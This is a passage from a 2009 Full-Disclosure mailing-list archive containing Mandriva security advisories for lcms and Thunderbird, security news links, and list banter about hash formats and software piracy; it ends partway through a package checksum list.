958ace1fe31a29df9e0ae7def01a72e9 > 1ea95dfa189f03e723d800a14740197c > 987205d906e98d1e23c46659bfeb389a > 5286827e25643a66b0d4823ee492004a > 2481d318d6ea2ea2af10af64d2203ac6 > 02a3c07ae1f9662d4375d6586e6cce97 > b7095f8e8a4e0a4bbc1155ef2c495b4f > af671a4192a4ac0732da175185cb690c > e5a48398e8bf9a9fe274421ea48e532d > e95961cf8f47623bab5e3be8541c7aea > b8f76f41598302462affd1fb917818b3 > df89576229f264ae2c7aebd92f3eb5c1 > ee6271d6d6f4dadd9d93f265446898d7 > 76763d316ec90789ae9ed3bda0f260b0 > fd945157f527a52ce78b37a662ba3ae2 > 65845c483be88ac1b5be34cb4a39a062 > b30f718f101a3967e471ae8827e8e2f2 > 3ad2e2f177788d06b6ddedf01d641864 > c19975a84d2915d7de2e5aaca973aff3 > 268cbcea00e2ac78f497e3c40b5d6d16 > baa6552f904cfe608733a290fb3b0348 > 8cef9785397784af320aad64d4a451fa > 1185b5a82873f3b6a7af2e80b7000819 > 3a4af85f5803b75265e9d8483b311858 > 8d5ab13bf268d5af676f8d21b6463088 > 2a1c3be1c1fea0bb80a1242732f52003 > 1a052508cb706d60f970fc0b31929e2d > 5c2a7806346bcd89a24678fa0e556b24 > c34ea7f66d8adda39ab4d31a293944c5 > 2dfb7c91e7debc2c47028abba9878b8e > a83842d1970b8b9361b28994bdea133e > 9988fe16e6783b97f30dae9879b43108 > f7c2adcf3501371516b5cd7c41afade0 > 3f92a19b63644fab656f38413ab99f49 > bc3afe9ce52461a1a48203ad832b04da > dca51c6e633166ad7361086ae604bc9e > 3f02d51fa412af42fc8569a416a992b8 > 342c8599434faee181456f5ba1ecb89c > 936f1f7c562f1d62383981f727770724 > 5e99612e8301260b3fe3f4310b301d69 > dd5810c0a8b60b34c423dee8383323bc > 001ebe4cfff9e32ef4ee19137485a2cd > 8f5b148e2c3edcfc82f6b225a8642383 > ca00bd55ba0164405edd8965f0f527be > 83b70c007d10927fce8be15cd387e19f > 10248928399d1a23d543a12fa2ce55f3 > 597e73653a1798f6c7ae859e6bcbb0af > 50f6f302cdf09f97c35feb22353b7df5 > f726a9833d6cb765241f5b5407c75aff > 958ace1fe31a29df8b8df3134373bee0 > 1f6a7b08e47d947e0e5641802c9e4af6 > 666925ac26c0df66038ec6a2b05df1ff > 6d3f62a326e6685a505463353c8f5dc3 > 58d29e01339ce1ebc04db879e36be2a1 > f089a9ab5b3404d9e2dd14857a49fc15 > cd7545c0c1c0ccaa220b8eb542a50a09 > b984f08075ac64b29d0e0f06fbae8427 > b2daa21b13c410b5265d2e4398365f2b > f8b6f1db0c9b44adf497e3c40b5d6d16 > e0603724697cc1c0c119adf3c4c2fbc3 > 3ddf0c148fee11380606ca727bc419e7 > 41e6e4a81e4e27411eee1fe5f0da834b > 81079622b23ce42817262bbbdcde38c9 > 209d1e47a7bcb71d813b58bf4809881e > 1488a239d560d41d987af10a94a1ecab > fe20ecdaf9c90ec04ce346d85aed6d91 > c32ee9c5be9c64cecef763decfad4dca > 2907176aac354b46ebfec5d51a3f5294 > cb53a79af06450347c2f041f78c73aa9 > a3ecabc26e17d9213f92a19b63644fab > 79ba44f07337f89707282e178959d582 > 3915966def8d5939b3dcaa99a0f63dfb > 55ef531b7722a7f847183bb5cd62b448 > 2cbd414bdf1769637f121cafb1a4e42c > 3f92a19b63644fab686ef611d64d4641 > 93bde960aca5996742dcf0680fee7558 > 9c3d2204d817bd95bbc5031eb85239a4 > ad3b70730307b0924c3caf13dc6696fb > de091866bed93da6582cbff43b18ad70 > 34c370a3e5eefb81290eebf586d15184 > 2871985cdc38e885b16836e8598f98c3 > 3aa1f46ba0b2e10ff1fe16987ab96eea > f4894f0f34ab1e64d7461fb1bf45342f > e221c95c7502b1d1a8a3cdc2cf7bd7aa > 2012c9af47d83a325e1d0ccff62e6f64 > 654f6e35ce564578b242ade81f1a56ef > 3bc2d195600ec07a0e16b72f946bcb5d > 16f5408569724cd19b6bd8deb9070a7e > e52e66188a45d27c4b6dc31ae3b202df > c218181a6b95baf8c9331e3d07d06dde > 83b66338d7bb3f5e4065fb8fa70656ca > 4a1b0b72f02795fa3f92a19b63644fab > 0df1df0e0383002a5988938195dbb95f > 2a98945ce29d90a761f21d49a9fcaaff > aa69c6e314fe570da60f9889f9b3f5b7 > 0ef3c0e63d60af7bf7bdbad9a56f92c1 > e3304feb10c583e0414961201ead7711 > dc4bf95b9e80405f0e5baa8088f200da > 20d77139485e7dcb6f6802b339a56f44 > a3bbcef064dcc7b317ee3b975ef28472 > 76561a553f3dd6908aa898fb892c4238 > 8853bd85b9c969c0bb0deabf92b01aab > 35ba007891228128afdcaeaf3c75f4e7 > 955b6f31ad3bef73f204e86b358dc297 > ea0ec008244731b21d8ef6c5e7e91dcc > d7a9f71371167a91ad54212902f79cea > 293c912e8749701beb0ec4c5946e41a8 > a9438f75f0ca8520a372413806ff69e4 > db0e4462db5db8fe3c72948e3c77c27c > e4b78b2581d95ff7623c0a42459334da > 9bf2fcbd6c442fdbba0ba3d2a740a4ee > c8e82bbbed2d7e9d49be06c1b8f55d69 > cccc9543acdfbdc6a78ced6d2c93dfe5 > 9096e859cf9b831a72357556d4c6efa0 > 63fe302dd2fc94021b857452dffee418 > 55024e629d64f1681d147e79d082ca43 > b2d0166cbe8856873dc9f68a565fc385 > 194a35ce4915024a83bd142ef11623a0 > 3807189affca88837b55866d55ef3d9d > e7a4d0b15aed6b3af543998ae2e30daf > 26968709d7ef111df6e2f67eb4b1bfad > 3e5dfd1c173169e488f27a97761c4f55 > 49e2092463c532e7d4b1df036b49ae64 > 628318b514345b9b690bcbef6d1cb48c > 302d2de50749957722446cc8dd687648 > a479b9040d6f040139df82f206abdbd2 > 9db938625926c0eeba87865e43b6b1db > 194b5cc62b18ba57f402bf66d78012d6 > 4419b0f2c563262decde2e9ccab332a7 > 73521e12ca84441eefa7a98b25adc705 > aae8ad240dc401b7cf321def52ae1cce > acb630e1900e275250abf22d6ae13062 > aa671f4cc4a8a0a602c52a6278bb4f2d > 55f09792703c984f6321b1c5f929878f > 050f32bdf3350f2ebc8921dd89ad848e > ff215f1f313f322baaff624e7e458a9e > 059002c7580d9558f49e50e9f7377df4 > d6a24c1f2142abd103003338801da3a8 > 047dc4dff18bdd198d38c5512963620a > eb7540536991d738b91d110bb8269b89 > 0d44b28da8fe881f091f2ad5522e008a > 25a74e3446db34326cd21b3371a9a08c > 90b44e7e53d3ade605c0f3d5a4618c4b > 9e00fc8d31325c5d0c3ce21c0ae28193 > aac3a86fa21196a4172291f4daf8c9df > c9845d6996b41daa1242216ada091bb7 > b711ae04ce0fc771ef0800f576e3e8ab > 2f467e85ad7767c6cf31c40c4df46d74 > 1e2755823a16c89caa5c759c323b9f14 > c11a7ace4c3954f299e15335d1042ccc > a888c6bbad3434d54cd418a4ae94fe8d > 51917f11d9f248d3ba3ad7cbc0e32269 > 4f8cfa5108f64571f5c365582fcdb6bd > 25fff28dee2a9c2422446cc8dd687648 > fc765f312565d13e36c7faa21fc52059 > 88c1f0da9986ca1a0cccf04e7941c058 > 494e0e793bf2b978051e0e63bd30685a > 9064c122b0674b0ef780e8e79533d1ca > b0237fdd8c8393ac12ddb22764fd913f > d24f7abf637ca394c8c7c66406cc9e3a > f491206098ecb0cc2bce5b6bf689483d > 42f2b4d1fa8ebdc5 > > END TRANSMISSION > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From security at mandriva.com Wed Dec 2 22:41:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 02 Dec 2009 23:41:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:121-1 ] lcms Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:121-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : lcms Date : December 2, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in Little cms: A memory leak flaw allows remote attackers to cause a denial of service (memory consumption and application crash) via a crafted image file (CVE-2009-0581). Multiple integer overflows allow remote attackers to execute arbitrary code via a crafted image file that triggers a heap-based buffer overflow (CVE-2009-0723). Multiple stack-based buffer overflows allow remote attackers to execute arbitrary code via a crafted image file associated with a large integer value for the (1) input or (2) output channel (CVE-2009-0733). A flaw in the transformations of monochrome profiles allows remote attackers to cause denial of service triggered by a NULL pointer dereference via a crafted image file (CVE-2009-0793). This update provides fixes for these issues. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0581 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0723 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0733 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0793 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 01ea2178c04452079b300c237a0bb21a 2008.0/i586/lcms-1.18-0.1mdv2008.0.i586.rpm 9d6e6424a4e9487cde5c12cfe958c94c 2008.0/i586/liblcms1-1.18-0.1mdv2008.0.i586.rpm 3b013ce5dc1da79da14815d18b5b7fc8 2008.0/i586/liblcms-devel-1.18-0.1mdv2008.0.i586.rpm 0637a9b11dca1342bced0eb697e0fde0 2008.0/i586/python-lcms-1.18-0.1mdv2008.0.i586.rpm 475e24d51d168208c431ffc814bf4c54 2008.0/SRPMS/lcms-1.18-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 255e40215beea1b0192ac56c532a50ad 2008.0/x86_64/lcms-1.18-0.1mdv2008.0.x86_64.rpm 7c8d49f46ecb615a593e39ad512d4f9e 2008.0/x86_64/lib64lcms1-1.18-0.1mdv2008.0.x86_64.rpm b8e5511a200edaadaafa7ca62a058338 2008.0/x86_64/lib64lcms-devel-1.18-0.1mdv2008.0.x86_64.rpm ec3f3be64abd7a1c746fb759299382d2 2008.0/x86_64/python-lcms-1.18-0.1mdv2008.0.x86_64.rpm 475e24d51d168208c431ffc814bf4c54 2008.0/SRPMS/lcms-1.18-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLFsGqmqjQ0CJFipgRAv4WAJsGFPMNa+36VGKOPhy/m/4yTA518gCcDTx0 bleYpBVbdxSLCGxjXGyzs2Q= =d8EE -----END PGP SIGNATURE----- From ivanhec at gmail.com Wed Dec 2 23:39:14 2009 From: ivanhec at gmail.com (Ivan .) Date: Thu, 3 Dec 2009 10:39:14 +1100 Subject: [Full-disclosure] In the thick of it: how the Digital Economy bill is trying to kill open Wi-Fi networks Message-ID: <6450e99d0912021539q57d24982laf73dac869a193c1@mail.gmail.com> http://www.guardian.co.uk/technology/2009/nov/30/open-wi-fi-digital-economy-bill-government -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/0b5b5183/attachment.html From ivanhec at gmail.com Wed Dec 2 23:50:05 2009 From: ivanhec at gmail.com (Ivan .) Date: Thu, 3 Dec 2009 10:50:05 +1100 Subject: [Full-disclosure] =?windows-1252?q?Yahoo=3A_Our_spying_policy_wou?= =?windows-1252?q?ld_=92shock=92_customers?= Message-ID: <6450e99d0912021550t3b1d8fd4i59bec9b0cdd8df0e@mail.gmail.com> http://rawstory.com/2009/12/yahoo-spying-policy-shock-customers/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/bb98e660/attachment.html From thor at hammerofgod.com Wed Dec 2 17:19:22 2009 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Wed, 2 Dec 2009 09:19:22 -0800 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] In-Reply-To: <2d6724810912020711q5d477448w8bb8a1fe19eb1f3e@mail.gmail.com> References: <20091201194651.8F9E32803F@smtp.hushmail.com> <2d6724810912020711q5d477448w8bb8a1fe19eb1f3e@mail.gmail.com> Message-ID: <09130A33C60C9C4982D35105CBABB278279EF7FF34@Exchange.hammerofgod.com> The year 2010 will be upon us in mere weeks, and we still see posts about LM being 2 eight-byte hashes. Go figure. t -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of T Biehn Sent: Wednesday, December 02, 2009 7:11 AM To: McGhee, Eddie Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] Any hexadecimally represented 16 bytes is obviously an MD5. For those interested in finding signal where there is none: LM hashes are 16 bytes, but are actually two concatenated 8 byte DES hashes. From ivanhec at gmail.com Thu Dec 3 05:24:01 2009 From: ivanhec at gmail.com (Ivan .) Date: Thu, 3 Dec 2009 16:24:01 +1100 Subject: [Full-disclosure] =?windows-1252?q?Microsoft=3A_=91Piracy_no_long?= =?windows-1252?q?er_poses_a_threat_to_us=92?= Message-ID: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> In a recent interview, managing director of Microsoft Philippines Inc., John Bessey, has claimed that piracy no longer poses a threat to the software giant. http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/09355fbb/attachment.html From s.u.n at free.Fr Thu Dec 3 09:24:21 2009 From: s.u.n at free.Fr (S/U/N) Date: Thu, 03 Dec 2009 10:24:21 +0100 Subject: [Full-disclosure] =?windows-1252?q?Microsoft=3A_=91Piracy_no_long?= =?windows-1252?q?er_poses_a_threat_to_us=92?= In-Reply-To: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> References: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> Message-ID: <4B1783C5.1040903@free.Fr> Sure, dude, " please just STEAL my soft, that's gonna kill competitors" IE: what happend to PaintShopPro vs Photoshop? ************************ Cluster #[[ Ivan . ]] possibly emitted, @Time [[ 03/12/2009 06:24 ]] The Following #String ********************** > In a recent interview, managing director of Microsoft Philippines > Inc., John Bessey, has claimed that piracy no longer poses a threat to > the software giant. > > http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/c096b405/attachment.html From yirimyah at gmail.com Thu Dec 3 09:37:37 2009 From: yirimyah at gmail.com (dramacrat) Date: Thu, 3 Dec 2009 20:37:37 +1100 Subject: [Full-disclosure] =?utf-8?q?Microsoft=3A_=E2=80=98Piracy_no_longe?= =?utf-8?q?r_poses_a_threat_to_us=E2=80=99?= In-Reply-To: <4B1783C5.1040903@free.Fr> References: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> <4B1783C5.1040903@free.Fr> Message-ID: <173d1e2f0912030137r2b7a1a4bg231a1591d7664aca@mail.gmail.com> Hahaha. How many legit copies of Windows 7 Ultimate have they sold? Three? Or was it four? I guess this is their way of competing with free software... making *their* software free (yes, yes, money-free vs freedom-free, i know) except to those thick enough (or lawsuit vulnerable enough, ie governments and corporations) to pay. 2009/12/3 S/U/N > Sure, dude, " please just STEAL my soft, that's gonna kill competitors" > IE: what happend to PaintShopPro vs Photoshop? > > ************************ Cluster #[[ Ivan . ]] possibly emitted, @Time > [[ 03/12/2009 06:24 ]] The Following #String ********************** > > In a recent interview, managing director of Microsoft Philippines Inc., > John Bessey, has claimed that piracy no longer poses a threat to the > software giant. > > http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/5dc357cb/attachment.html From jlay at slave-tothe-box.net Thu Dec 3 13:00:08 2009 From: jlay at slave-tothe-box.net (James Lay) Date: Thu, 03 Dec 2009 06:00:08 -0700 Subject: [Full-disclosure] =?iso-8859-1?q?Microsoft=3A_=8CPiracy_no_longer?= =?iso-8859-1?q?_poses_a_threat_to_us=B9?= In-Reply-To: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> Message-ID: From: "Ivan ." Date: Thu, 3 Dec 2009 16:24:01 +1100 To: Full-disclosure Subject: [Full-disclosure] Microsoft: ?Piracy no longer poses a threat to us? In a recent interview, managing director of Microsoft Philippines Inc., John Bessey, has claimed that piracy no longer poses a threat to the software giant. http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 Heh..make an operating system WORTH pirating, then we?ll talk. If the pirates aren?t interested in your software, you know you have a problem ;) -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/b01650ce/attachment.html From netinfinity.securitylab at gmail.com Thu Dec 3 13:54:45 2009 From: netinfinity.securitylab at gmail.com (netinfinity) Date: Thu, 3 Dec 2009 14:54:45 +0100 Subject: [Full-disclosure] =?windows-1252?q?Microsoft=3A_=91Piracy_no_long?= =?windows-1252?q?er_poses_a_threat_to_us=92?= Message-ID: Yeah right. What a cheap psychology.. "If you have cracked win 7, then your bank accounts can be stolen - So buy the original" -- netinfinity From nikropht at gmail.com Thu Dec 3 13:20:37 2009 From: nikropht at gmail.com (Mike Eber) Date: Thu, 03 Dec 2009 07:20:37 -0600 Subject: [Full-disclosure] Open-Source Effort to Hack GSM Message-ID: <4B17BB25.7030404@gmail.com> http://spectrum.ieee.org/telecom/wireless/open-source-effort-to-hack-gsm .."Karsten Nohl, chief research scientist with H4RDW4RE, a Sunnyvale, Calif.-based security research firm, is mounting what could be the most ambitious attempt yet to compromise the GSM phone system, which is used by over 3 billion people around the world. Others have cracked the A5/1 encryption technology used in GSM before, but their results have remained secret. However, Nohl, who earned a Ph.D. in computer science at the University of Virginia and is a member of Germany's Chaos Computer Club (CCC), intends to go one big step further: By the end of the year, he plans to make the keys available to everyone on the Internet."... -Mike -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/85fc0ee1/attachment.html From kevin at tux.appstate.edu Thu Dec 3 14:45:32 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Thu, 3 Dec 2009 09:45:32 -0500 Subject: [Full-disclosure] =?utf-8?q?Microsoft=3A_=E2=80=98Piracy_no_longe?= =?utf-8?q?r_poses_a_threat_to_us=E2=80=99?= In-Reply-To: <173d1e2f0912030137r2b7a1a4bg231a1591d7664aca@mail.gmail.com> References: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> <4B1783C5.1040903@free.Fr> <173d1e2f0912030137r2b7a1a4bg231a1591d7664aca@mail.gmail.com> Message-ID: <5d6848b00912030645g423dc6b7y4994e5962e550595@mail.gmail.com> 2009/12/3 dramacrat : > How many legit copies of Windows 7 Ultimate have they sold? Three? Or was it > four? > I guess this is their way of competing with free software... making > their?software free (yes, yes, money-free vs freedom-free, i know) except to > those thick enough (or lawsuit vulnerable enough, ie governments > and?corporations) to pay. Or to those who feel software developers should be compensated for their time and efforts. It's why some of us buy new copies of OpenBSD when they make a release, or why some of us have a purchased copy for each production device we deploy. It's the reason we have a valid, purchased license of Windows [XP Pro | 7 Ultimate | whatever previous version] for each machine that's running it. If we're using and benefiting from the code, why shouldn't the developers get compensated? Not everyone has the same feeling of entitlement and greed that you just displayed and I daresay that neither makes us "lawsuit vulnerable" nor "thick". kmw -- Beware the leader who bangs the drums of war in order to whip the citizenry into a patriotic fervor, for patriotism is indeed a double-edged sword. It both emboldens the blood, just as it narrows the mind. And when the drums of war have reached a fever pitch and the blood boils with hate and the mind has closed, the leader will have no need in seizing the rights of the citizenry. Rather, the citizenry, infused with fear and blinded by patriotism, will offer up all of their rights unto the leader and gladly so - Unattributed, post 9/11 From security at mandriva.com Thu Dec 3 15:07:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 16:07:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:217-3 ] mozilla-thunderbird Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:217-3 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mozilla-thunderbird Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A number of security vulnerabilities have been discovered in Mozilla Thunderbird: Security issues in thunderbird could lead to a man-in-the-middle attack via a spoofed X.509 certificate (CVE-2009-2408). A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update provides the latest version of Thunderbird which are not vulnerable to these issues. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://www.mozilla.org/security/announce/2009/mfsa2009-42.html https://bugs.gentoo.org/show_bug.cgi?id=280615 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 22ce174eb2b68d124ca745a618ab0526 2008.0/i586/mozilla-thunderbird-2.0.0.23-0.1mdv2008.0.i586.rpm 78d161d683f079f629f0361f7ebe23cd 2008.0/i586/mozilla-thunderbird-af-2.0.0.23-0.1mdv2008.0.i586.rpm c8995e1c756e7fb460c1cb76d53e3860 2008.0/i586/mozilla-thunderbird-be-2.0.0.23-0.1mdv2008.0.i586.rpm f7311f7ba1fc2dc875c4330ac7ea98a3 2008.0/i586/mozilla-thunderbird-bg-2.0.0.23-0.1mdv2008.0.i586.rpm c1e2f98134e0593c8fd4034e6495604d 2008.0/i586/mozilla-thunderbird-ca-2.0.0.23-0.1mdv2008.0.i586.rpm ca29f94b7ce5b5e96f8e316b38bb2bf8 2008.0/i586/mozilla-thunderbird-cs-2.0.0.23-0.1mdv2008.0.i586.rpm 4c167d2cf99c88b4fafc3a493449bb8f 2008.0/i586/mozilla-thunderbird-da-2.0.0.23-0.1mdv2008.0.i586.rpm fcc68e8736ed0fcc9710703bb2be6ef7 2008.0/i586/mozilla-thunderbird-de-2.0.0.23-0.1mdv2008.0.i586.rpm c9c7d119dc3be64f6f22183046a284ee 2008.0/i586/mozilla-thunderbird-devel-2.0.0.23-0.1mdv2008.0.i586.rpm 6ce999e22e5426386557a63a5bbe86e3 2008.0/i586/mozilla-thunderbird-el-2.0.0.23-0.1mdv2008.0.i586.rpm c657104140656877b3f0f590c5f81dce 2008.0/i586/mozilla-thunderbird-en_GB-2.0.0.23-0.1mdv2008.0.i586.rpm 330d7a5b51baa23e0c57d7925344e093 2008.0/i586/mozilla-thunderbird-enigmail-2.0.0.23-0.1mdv2008.0.i586.rpm 1e93bfc29c672524b0e96acaaedf10c9 2008.0/i586/mozilla-thunderbird-enigmail-ar-2.0.0.23-0.1mdv2008.0.i586.rpm 6745c465e515e701f38c7941df45117d 2008.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.23-0.1mdv2008.0.i586.rpm bc2d663ca48187e61cb7c15f8a839f69 2008.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.23-0.1mdv2008.0.i586.rpm 9b1a530bde521eddf79ecc80ec4cf7e3 2008.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.23-0.1mdv2008.0.i586.rpm 52349bca12ed712719c7c3b89c7d9a52 2008.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.23-0.1mdv2008.0.i586.rpm f3217909797b4f1f6e7426599f8a28db 2008.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.23-0.1mdv2008.0.i586.rpm 97bf57da4695aa653b8359e27668f458 2008.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.23-0.1mdv2008.0.i586.rpm 9f53acbc7fa384c5a57813b748a86ce3 2008.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.23-0.1mdv2008.0.i586.rpm 6bd93597bfc9852c4187cffe263981de 2008.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.23-0.1mdv2008.0.i586.rpm 03b20c0dcd02a8544e0656883f0f5ec3 2008.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.23-0.1mdv2008.0.i586.rpm d851c78235bf4e333849bb374d285f15 2008.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.23-0.1mdv2008.0.i586.rpm 54f25e693156d25b5cd5dd8be6eb66d5 2008.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.23-0.1mdv2008.0.i586.rpm fd9166aa4861d39c17a1b2a1d7b27c3d 2008.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.23-0.1mdv2008.0.i586.rpm e85fc5e881499ff052f697a7a982c39f 2008.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.23-0.1mdv2008.0.i586.rpm a2f9f68cc5c14013b53a400148db7d51 2008.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.23-0.1mdv2008.0.i586.rpm da1f17cc161f3ab46b10f2c77c4ea143 2008.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.23-0.1mdv2008.0.i586.rpm 966d4f5f3941b70906a8973ae7a4711e 2008.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.23-0.1mdv2008.0.i586.rpm e3a8abdbbb825834daf555a74fd48016 2008.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.23-0.1mdv2008.0.i586.rpm 490a51bbe35b27c1a1b7cd8b198d6602 2008.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.23-0.1mdv2008.0.i586.rpm 5b5df29e7dc10963fe6df47dd4e8365b 2008.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.23-0.1mdv2008.0.i586.rpm ba8dd3cf9260a800dd15cc69b2f70b43 2008.0/i586/mozilla-thunderbird-enigmail-sk-2.0.0.23-0.1mdv2008.0.i586.rpm d0085adfda1e1f086eba568c98b64ef0 2008.0/i586/mozilla-thunderbird-enigmail-sl-2.0.0.23-0.1mdv2008.0.i586.rpm 6e9fa47b2efe01db4fa3d5bfa9feb087 2008.0/i586/mozilla-thunderbird-enigmail-sv-2.0.0.23-0.1mdv2008.0.i586.rpm 54f5ddc5c323941cb7db535d4bbde6cb 2008.0/i586/mozilla-thunderbird-enigmail-tr-2.0.0.23-0.1mdv2008.0.i586.rpm 5bf2049f588231fe0d7126c0acd6b72b 2008.0/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.23-0.1mdv2008.0.i586.rpm 7d5d75b32a7b74c5e3f8256fb72980b8 2008.0/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.23-0.1mdv2008.0.i586.rpm 21529fcfa926b43a5d2c3ef8e99e0a3a 2008.0/i586/mozilla-thunderbird-es_AR-2.0.0.23-0.1mdv2008.0.i586.rpm 1bada4c0d770390172e88fe176d72ca2 2008.0/i586/mozilla-thunderbird-es_ES-2.0.0.23-0.1mdv2008.0.i586.rpm 62bcf5bdeb06c3f412f42743eb652041 2008.0/i586/mozilla-thunderbird-et_EE-2.0.0.23-0.1mdv2008.0.i586.rpm 05267d191b303f55f159e79dfa2476d7 2008.0/i586/mozilla-thunderbird-eu-2.0.0.23-0.1mdv2008.0.i586.rpm 99d950026a189a8489128935f0dd805e 2008.0/i586/mozilla-thunderbird-fi-2.0.0.23-0.1mdv2008.0.i586.rpm 2e86ecea9efb769f34122b3d1dfdad79 2008.0/i586/mozilla-thunderbird-fr-2.0.0.23-0.1mdv2008.0.i586.rpm 7f047f0bd1858d20ac17a81a7d39aaee 2008.0/i586/mozilla-thunderbird-gu_IN-2.0.0.23-0.1mdv2008.0.i586.rpm fd101587a0b2bf6c36acd1f5b3710c6e 2008.0/i586/mozilla-thunderbird-he-2.0.0.23-0.1mdv2008.0.i586.rpm 046fb5b39b3dfec5dc683adc202f5f96 2008.0/i586/mozilla-thunderbird-hu-2.0.0.23-0.1mdv2008.0.i586.rpm 68d5d122ce36071233113cdb6617a66d 2008.0/i586/mozilla-thunderbird-it-2.0.0.23-0.1mdv2008.0.i586.rpm e8b3a87e32a3a84041c5dd80313ae141 2008.0/i586/mozilla-thunderbird-ja-2.0.0.23-0.1mdv2008.0.i586.rpm 477fd134232a31c78f6d05c0c2173017 2008.0/i586/mozilla-thunderbird-ko-2.0.0.23-0.1mdv2008.0.i586.rpm 